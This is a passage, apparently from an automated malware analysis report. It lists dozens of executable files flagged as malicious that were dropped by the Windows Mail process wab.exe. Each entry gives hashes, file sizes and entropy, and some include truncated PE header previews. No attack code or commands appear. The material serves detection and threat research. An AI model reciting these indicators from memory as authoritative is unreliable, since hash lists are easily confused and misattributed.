                                                                              Entropy (8bit):5.433980224483478
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3Vo9weqz1lezmtJwzojsKyyJFGgHZ//rHzb:/rk2qzXe0wSyyJFD//Hb
                                                                              MD5:96BEF7D0D48512DC35CDD2D4B1FD6EAD
                                                                              SHA1:0EEE984FAC4294D58E25C692C087DFE601D67D01
                                                                              SHA-256:00F9AECF764C5846BD073E8C08BB1CB82388123CCE4B05BC518C3914C941E38E
                                                                              SHA-512:8B3D4D36DC5D77926EB0EB0A1F98C9D40A97457D9F586E6A722093D0F43321FB4709EB799DE85827C705EDA783C5BA847648D9EBF34B014FD932B21D2D57B9EA
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):662600
                                                                              Entropy (8bit):5.905694343231267
                                                                              Encrypted:false
                                                                              SSDEEP:12288:Dpo/FEVciSJJtH4PoR6moWEBfQLxZPhEx7xgtV2hv4tkYUK2tlIqR7lmNK/IKrtK:SFEWi4JtH4PoRfoFIxZPk0NKbB0R
                                                                              MD5:67BF76A8779842B6187E7EF286154124
                                                                              SHA1:2ED18F92D51D677FDC3695406CDA01F5C188E3A0
                                                                              SHA-256:3E4B1C352CE41EA00B9A1BFCFEB4693AEE09E27F5B7F2A46CF3CD00A35FA8FBA
                                                                              SHA-512:A622980F704777BF7115BF9A06AFB89BE0771BC835B11E944A8C592CB3FA05071386ED94547D6159AC03F6F3719AF4726363AC4FC1F0EB10370CB3A4F1A5EF8F
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):260560
                                                                              Entropy (8bit):5.172772453978791
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkp4ZAh7ULoQdHBjw8Q2pFj4+W1ISYpksZmRohnonRBfTjzJEthEWV:cPfQdhMuj4VM8imPjGthEWV
                                                                              MD5:9A855D46CF345F40A323616382F3455B
                                                                              SHA1:69629A04683AC5A7163F8BBBF1BB2CB823B17D6B
                                                                              SHA-256:569B5CC8EF232D6674DBEC8D78F81E70023D6EEABBE974DFC68FF4DB763FEAF5
                                                                              SHA-512:DB43F60397080E72BCC5A9B8F24E0833EDADE5C85880F357AE50F0604D2DB2235F1D93F089AA57826DE1E82A8719DFF8CA0F502E7AA0AE37E1DB7229DF139751
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4316200
                                                                              Entropy (8bit):3.8981940471710472
                                                                              Encrypted:false
                                                                              SSDEEP:98304:pYN3nsBQ5ghvEyqf/whWovz9hRJ5RbisrbdsPO9jXsw:eN3nsBcghvEyqf/whxz9hRJ5Rbisrbdr
                                                                              MD5:002CF143B2DB2AD8C0242ADA462F145E
                                                                              SHA1:77DE72A11B14F402C4D501C69BC3FD8B51B4642D
                                                                              SHA-256:75A84EE4590896B68F4D17E5247BA9C76E2809CEB341EEB201493D617D5C7601
                                                                              SHA-512:5BBA377866F2D2AFAC1DFA2201A26A1A1B6491982F0389DCBD5815E6FD9AF7D7110AEC8608926D307437F48501D0E3E4BF89DDA7FEB98214D79B1BFE7510B6BD
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):124056
                                                                              Entropy (8bit):5.162520482821961
                                                                              Encrypted:false
                                                                              SSDEEP:768:sEl9bbSVh7VWYOzL49oWFGJ+fkSk7Rczjn9znrRtPn9zNU4sm2QBcPOvI:sEl9bbS3VoZwu7mzj9zNtP9zNps8Q
                                                                              MD5:3FE3567269EE2A38998100DD56D0C35A
                                                                              SHA1:273677012FE63C88B051D56028DD6915167FBCE5
                                                                              SHA-256:DDB5B86E768F863A56B8B4B717CFBF59A187EF8B1AFA841F7B72237C79A32DB8
                                                                              SHA-512:00A60C9395844CC8DE48DA167E00369E7AAEC59A06F31869CB19DCF86C0BEF5A18EA0C141F408DEEF7DE0A935EB0CDAD27790377258717A1DF592E677B79E0FE
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):358336
                                                                              Entropy (8bit):4.285457679979659
                                                                              Encrypted:false
                                                                              SSDEEP:6144:/yUkKOEEIK128d2VKjw0EYsfZJnPmTuJjac2a51lHpLszc/kzY56Y:/x/B/kib
                                                                              MD5:1A65939043DF2CEAD4643A92E4976D91
                                                                              SHA1:B04C8E1BAB15CE5F05071904D4DFD5DA7188EF72
                                                                              SHA-256:A813B53FB7C77DBE4E67D76A488C2B53A298824A6A1BB010FF55FDECFF7A7082
                                                                              SHA-512:BE08E9D6315BDAC96667D3FD36B785EC35F35BD25C7EB6A9421DE403430552F1695707B083C3CA99E30D4FDA33A0A71E10DEA89E65BBFB91FAD35D237B5D45C3
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):763032
                                                                              Entropy (8bit):4.0026170623684765
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkcwRnjnzhCiXXXXXX1AzZwAazTwdOLxN1IHO:TwRnj7XXXXXXSzuz8OZ
                                                                              MD5:5B45157A040A388147F2A881D0DD0AD5
                                                                              SHA1:413FD5E5DB3174D558F3EBE70688A5C41E5DE109
                                                                              SHA-256:BF906BC259DBEB8D7B45F8CC41A7A7C26576B018AFCD7EE7DC7F2743F8375CE2
                                                                              SHA-512:5B0E915CDCF2F844AE8C5E10D9282382DD3198C8EB67556774DAA85225128307D958D0A457E89EEE66FB87DCBB1FEAE4DF85EC52364930FA58E45DACBC5D9D27
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):895120
                                                                              Entropy (8bit):2.860376586914997
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkofCEq7tOxIfMFzCEpAm/4rx7z1arf+9:az8w
                                                                              MD5:DE69185016C6898EB989FF0FFE42D0F3
                                                                              SHA1:AF2EBD25315FFC7C3C2981DE9371D0827B8AF7D5
                                                                              SHA-256:FF89208A70C006CF7CDC585CA29387C24CEEBE2FC239D0D16EBBBBE2DE672899
                                                                              SHA-512:E2B300286DBE9F7A5635BFEE07C03D2E5FC21A9B658CB5E69ABB0A071A15F7B9781C37B9E64C935F8AD54D205AA221D7D679C9D7D1C062426795C279FC5245A9
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1082008
                                                                              Entropy (8bit):3.688463156686676
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
                                                                              MD5:3A47AB68F40340B1078860C968FE8489
                                                                              SHA1:D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
                                                                              SHA-256:45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
                                                                              SHA-512:0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):105440
                                                                              Entropy (8bit):5.4479881956053084
                                                                              Encrypted:false
                                                                              SSDEEP:768:sEl9bbSVh7VWYOzL49oWQrkw1jL9zxwKeL9zgt5tjTh7D9:sEl9bbS3VoVjhzxwKehzgt5t1D
                                                                              MD5:D1346C4098D16AC440D5665B99AD4299
                                                                              SHA1:08EF1AC534221589574D4EA2FCD222CB099680DC
                                                                              SHA-256:B8F1B885A5DEDF6893C175CFBA736CDAD9065EF21DD0CDB9BF692E190939657E
                                                                              SHA-512:4F44966E22DEAAD0597A2EF3A0BDB73228D5AD4BE2DF28B9163A3148AC7F11BD322B71198B1FC9281229C03BA0566ADB9D43DE4E390C460EAF3922B8BFDE34A9
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):537536
                                                                              Entropy (8bit):4.820102239387087
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkHPMMRMMMmMMMvMMMwMMMNMMMWMMM3MMsewVOOMzMMvMMOMMMJMM2MMQM6k7uD:TwVR6V7byjUWAZyVVdz8eEdGo
                                                                              MD5:1C214A282C02A2210D46E12AD1644AF9
                                                                              SHA1:4BA7AB5B9869DA21718783ACF5890F5536C75673
                                                                              SHA-256:FF47F769CFFF7BC22EFDC90931AA634879F761EE5D8CDF421062405D0460CE88
                                                                              SHA-512:9260337144393E67C25B28042C25C473117E2E8ED58D16B152D942CA8445DE7D7ECEB4AA7C13CCAFE7C062EC9C872BB3022260061233C30D90DE6F324D417EFE
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1271952
                                                                              Entropy (8bit):4.010875755285499
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkj3ppPpNpDpspp/pCp0pmppdpspppRppMpLp0ppppbpQp2pphpSpXpQppaplpG:TKQSNdhnSzv
                                                                              MD5:9DE7FBDFAAFCC0160D5681DF12BB69D6
                                                                              SHA1:4FA77F76857F535B821279F049B790A51E9A8BDB
                                                                              SHA-256:1AA9AFEA2C76C14A0E0079F3985BF54A7FCFB63E4978FE2520BC291A235F6CE1
                                                                              SHA-512:A8E168D8564892C8D9CDD30C2B7FF38DA77F5B4088861D6169E9810C423FE90C41FDBB2E124849B266944401E4ECF28A35361B2E89D738567028E2F2F835F3A3
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4099760
                                                                              Entropy (8bit):3.693585524111332
                                                                              Encrypted:false
                                                                              SSDEEP:12288:IBKs7fvZIFpCYVIVN2mGsb8HtVLaHw3j4cLbUBRjLFP29DyZbT9gb/m06aCzE6h9:IBKszX0FjOeblHiled/k
                                                                              MD5:4FEED17F8FC70D5BB28C4862D6A889F0
                                                                              SHA1:1F22653E28C40C5E1DCA3359E8D09201F826CADA
                                                                              SHA-256:2D07C962AFC6E270F04FC82EA4E80D207722AD4064E3B4C3DD58C01FD28C9FD9
                                                                              SHA-512:7BAA4F2A7B38742A00D879079DC0505A16D49261163FC0BDB21BD2709EC91310F15FA1BA0AD0AF053BDC2F341EB0A7B8AD536A6B2DBA88BA1AEF4D2643871269
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1273488
                                                                              Entropy (8bit):4.248522979382886
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoFqYvbZthqyEATS583ONoTqzaezuC8zFtxzzqO9uF:/rkt6bZt+ATS583ONo4aezJ8ZfqiA
                                                                              MD5:EAEADD9008A5081007BD4EC21056B686
                                                                              SHA1:6E6FAF94275ECD60262A054AFAB6FB2EB9407FB9
                                                                              SHA-256:5F97D3C8153157B4735B36EA3E6017A8977BF6F094285ADC5F4229490E3DFF64
                                                                              SHA-512:0E991651B2F43B0DE5D43CE1E13CD20B8127FBE7C730F649097B8F380E19198C48E9AA73B597B8BE6A9A02650E0EE84FC37D5876B6A5C0A85551E03BB76AFD90
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):124056
                                                                              Entropy (8bit):5.162520482821961
                                                                              Encrypted:false
                                                                              SSDEEP:768:sEl9bbSVh7VWYOzL49oWFGJ+fkSk7Rczjn9znrRtPn9zNU4sm2QBcPOvI:sEl9bbS3VoZwu7mzj9zNtP9zNps8Q
                                                                              MD5:3FE3567269EE2A38998100DD56D0C35A
                                                                              SHA1:273677012FE63C88B051D56028DD6915167FBCE5
                                                                              SHA-256:DDB5B86E768F863A56B8B4B717CFBF59A187EF8B1AFA841F7B72237C79A32DB8
                                                                              SHA-512:00A60C9395844CC8DE48DA167E00369E7AAEC59A06F31869CB19DCF86C0BEF5A18EA0C141F408DEEF7DE0A935EB0CDAD27790377258717A1DF592E677B79E0FE
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2970664
                                                                              Entropy (8bit):3.820583432588951
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk2d0qVmvzC1SvXKo3NzbsZ6DdIAZcbEcofUnpfRII8Lp9qgN3WJp0Rf5NGpHsh:v/V/CfDhNG5sMXjjzmEPoL
                                                                              MD5:E9C85E1FA1B8589A48F3EB64AC2AEF55
                                                                              SHA1:79FC306650CA197E7EAD24B543C648A05F2135A7
                                                                              SHA-256:68177C8014C778BD17E522F2BE6FE4EC0D8C81BA3B99B2A7EF9787CFA13D8778
                                                                              SHA-512:DD6074E277BDB8C32F60C4D5B597A2765B302C528C83FA7C9241172376734CC4B192F4B51FBD49DF3DCCA402D250C1F5A9A4F629F1EE945F0A480ACF60D26774
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3531712
                                                                              Entropy (8bit):3.7529139446179247
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkmKGOKsuWoZ65B/SRDF7eYECYK6QojSgQojS+E1c9zvWiYwOsqE1c93se1jLvI:psSR7PYKzz38YwZItvsDu7DbDhRAUzHW
                                                                              MD5:99E2EFC53DBFF45C58BD02DE092DA361
                                                                              SHA1:23D1B97242F3ABE6A2FA2760979E685CE6C0E2A4
                                                                              SHA-256:75AA16261BB138BB189DCED02C4F2513B1708A34EF6D32DCA7488F274C12C848
                                                                              SHA-512:1BFF3410DB57ACAFA690187E5F8FB371BFDB7CF98A5CBA8CE994A3F5C3772343B29638B977C498DB665F6AA2A6339846D2CB999E9A34F68730E327831B0F219D
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4319272
                                                                              Entropy (8bit):3.79026092720144
                                                                              Encrypted:false
                                                                              SSDEEP:6144:lmRfvlTZY/C3ul0ywb/uXMo+YJ7M41zXLWIB:l+6M+595B
                                                                              MD5:27172A2CB05C40580B9017E397CFEB83
                                                                              SHA1:F6BEE6DB343B8872D2A7C76257634DD19D7C7D79
                                                                              SHA-256:4723D994C08DD93D23FEAA220B856AF02E1321E03195AFD52556DAF0405BFE32
                                                                              SHA-512:DE7C44A923213B546719B4FAC292E1A4FE3F986578B8AC694BA5AF0F6BB463308434C3AE37D098F126558EE09FBCA39F6D85B4FB87694C63A789E4A50359861C
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1082008
                                                                              Entropy (8bit):3.688463156686676
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
                                                                              MD5:3A47AB68F40340B1078860C968FE8489
                                                                              SHA1:D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
                                                                              SHA-256:45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
                                                                              SHA-512:0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):582184
                                                                              Entropy (8bit):6.307656763450446
                                                                              Encrypted:false
                                                                              SSDEEP:6144:RLWET8DS698nGX2OduCwUJWh/JmmS3DAjqnkrzFoEh+vMKC239YUFgBdQ/:RLxT8DhyiLduCe/lSpn6zOvYUFg4/
                                                                              MD5:8E107EC5C05E14ADBD1E438D34E95933
                                                                              SHA1:24886C632652861525F572C7BF712C5EA77FA528
                                                                              SHA-256:C22DC2815FC5A8EA00A8E6C24369DFFC739E40D70C855E8D0CC4FC880852C1C9
                                                                              SHA-512:E39FFD9CDB5606E18F8FE9ABBB7D8B4EE541E6930B60E9726531706252FC403E9A44EF16143DC23B4C3ABCCBF6026FE5C0F5B6A2470F8DBB042F5FCF1B165C1E
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3837992
                                                                              Entropy (8bit):6.430735070062025
                                                                              Encrypted:false
                                                                              SSDEEP:49152:nB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EK:7HzorVmr2FkRpdJYolA
                                                                              MD5:2F12C8B3D0AD5544C44A027661513F42
                                                                              SHA1:ECEE87DEE3CBC301B9667EE8D4E71B44ACD6E1C0
                                                                              SHA-256:80A2436A6A0D526D1A194CF0FD93704BB00DD853CC75882F007FD1FD1634E92D
                                                                              SHA-512:686A0711379700973F8C63F3AE163D5302AE770DAF8AD64D1FB405C254524D8534892C65EB6686D89D4A4BC27C2CE142F1FB14E46B55F1EE8E190405E2949742
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):161832
                                                                              Entropy (8bit):5.761346604218296
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkl2VSd2ga8KActASiZAkXS1xU5M3XgcoT0cs4qIm6Y6:5VSktVjv3Xg5T0FIY6
                                                                              MD5:547C9C694BBBB41A9D14ACB071FD2655
                                                                              SHA1:CFAB946D63B2FD3AD9B25A7C24F43FBDCDFCB66D
                                                                              SHA-256:B4EAE61AE843F58EB2F4A30FFEC9E818806A15D0B897F4939232930600AC6F32
                                                                              SHA-512:EE25C544B05408FDD1C42396FEEDC734E2A966FD173BEBCC56995D86914F183F2487791C1204157032648AB26F4BF7A161212D173371395BC974DE30CE02F556
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1827880
                                                                              Entropy (8bit):6.514076024677014
                                                                              Encrypted:false
                                                                              SSDEEP:24576:phDdVrQwm5ztlU0A7fMAHmpmZ3QXE/0/lVaLpmasGvP0:phDdVrQ95RW0Y9HyWQXE/09Val0GE
                                                                              MD5:F89BA0EA3E9D573B68F776CDF7F7CDD7
                                                                              SHA1:CAE2E1EA681B990AC9E14D5DD7224A69DCDC134D
                                                                              SHA-256:C2338FC4DD77DF806830471324BEFB0C8BF90042EC166A04B733F3B1174291DB
                                                                              SHA-512:8E2D6C493B6C955B867F52795232CAA33CE95A5D615F834AFDBC09B12750E23C03A771C0C4190AF00958B5E449030B2A221DCE4955A3AA241729DB60237AADA4
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1297448
                                                                              Entropy (8bit):6.477378890661513
                                                                              Encrypted:false
                                                                              SSDEEP:12288:BdoA0Eh2XptoQZRuefMYR6RrAJU9CsxmMocSipEylqFfouDMA+nkSddSDBDIq:B70E0ZCQZMip6Rrt9RoctGfmdd0
                                                                              MD5:DF4B1DE5F9CEE22E7C47D5023ED73F23
                                                                              SHA1:38329123EEC0496BBE07B3B274F139E809705943
                                                                              SHA-256:0EF0AD16A9F6E054F3FDDE1DD2984DFCE8F4466F44CA616C78B03577A6ACEC1B
                                                                              SHA-512:8207A1DC020412B5A924665043AF347437825E128122DC93EEF4ED7122D98E0695183637F4D56EDE014EF95235D659A35B5011FB4D701867742090BD3F4308AD
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4251688
                                                                              Entropy (8bit):6.49452169775478
                                                                              Encrypted:false
                                                                              SSDEEP:49152:ppawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BT:+ehFLvTQDpB5oSOmlBl
                                                                              MD5:D7F3BB1C8DDD48162CFB914CC0BD2B28
                                                                              SHA1:7C88DEA6E637E95D486769CAC5195D76D61CAD8D
                                                                              SHA-256:A6578F4E1089C55627499E1EA32386041BFEE10CD3ADB90F9D2098F90A92C99A
                                                                              SHA-512:5B9276369DA9D1962716AF74C3098ABA884FC56E5067A00DCC17A1924204B63EF8250003F50FEC43EC676DDC7357F398017ACDCFB89A4B4B6351394822797237
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1319976
                                                                              Entropy (8bit):6.467419492813544
                                                                              Encrypted:false
                                                                              SSDEEP:12288:+yeb4D2VLtrQA1Yim7XGLZxHwlqxlThfkY8bo0cITiLEpPoVfMA+nkthF2g0oz5:+iD2VmA1YXQHwlklb8boUuWPg2gX
                                                                              MD5:1DA657653D9309EC964A8A4EE00C297F
                                                                              SHA1:EDA6072D4BBB59A9840B746C9A3B51E3FCFF746F
                                                                              SHA-256:FF51B182FA83FE86E0B41327CCB61191DC85DD01E39FE31E9F36F06183795FD5
                                                                              SHA-512:2F37150DB52489D79CE150EB1E29B14F1652244CE7BE7D7B01B179003392DA57D4314207720A59683604A34A192F49E9C8B06405CABAF0CE51657D65BFED1AA0
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2327080
                                                                              Entropy (8bit):6.50909197138894
                                                                              Encrypted:false
                                                                              SSDEEP:24576:AfD3zcv9ZhsSGSQoryOzozU63IqRNhB0kDKPHkkkkkkkBoIeAz:AfD3zO9ZhBGlopzM3HRNr00z
                                                                              MD5:5F13BB2123CD84449668B7BE660E03A1
                                                                              SHA1:C7840723CCCF0A98FA164DE55C97FEAE9BC07103
                                                                              SHA-256:69E2DC86A07D17BD965031B1E39EC2921531EF0DA5AC8DE3939E264A606232DF
                                                                              SHA-512:894BBA05A32679B584297B0E53ACB71DAEDDC63AE4B0247E42DDC873BF83404464386B2B1B38D0020607BF0F1C34210AD629ADC8B88E21A289CDF64E50E4680F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3790800
